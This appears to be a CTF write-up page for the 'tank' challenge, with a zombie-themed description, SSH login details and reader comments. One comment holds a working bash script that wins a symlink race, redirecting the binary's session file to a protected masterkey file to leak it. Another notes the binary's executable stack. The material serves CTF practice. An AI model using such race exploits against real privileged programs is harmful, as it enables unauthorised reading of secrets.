You are trapped at a military base, you got zombies coming from the right, left and front. Of course, you are running out of ammo and there is no much hope left, but there is a huge door behind you. You got reason to believe that there is a tank behind it, but it is secured with a secret masterkey. There is also a terminal on the left side with a binary on it to authenticate and open the door called "tank". You are lucky and the developer was really exhausted when creating the application, so there might be some bugs you can use to get the masterkey, but watch out for the zombies!
SSH: ctf.fluxfingers.net
PORT: 2095
USER: ctf
PASS: xxx
| Action | Rating | Author team |
|---|---|---|
| Read writeup |
not rated
|
Delusions of Grandeur |
The writeup is cool, but unnecessary complex. You can make tank read the masterkey itself by making sessionfile a symlink - it the outputs its contents to logfile =)
The following bash did the trick for us:
for i in {1..1000} ; do
rm -f .sessionid
(sleep 0.1 ; ~/tank sadhfkjshdfkjh) &
pid=$!
while true ; do
if [ -f .sessionid ] ; then
ln -sf /home/ctf/masterkey .sessionid
break
fi
done
wait $pid
done
After that the logfile contained the flag as one of the session ids.
Well I know that the symlink solution was not intended by the author, and also the Buffer Overflow should have actually been quite tricky, but the binary unintentionally did not inforce w^x pages, so the stack was executable ...
Why then bother writing anything to the logfile?
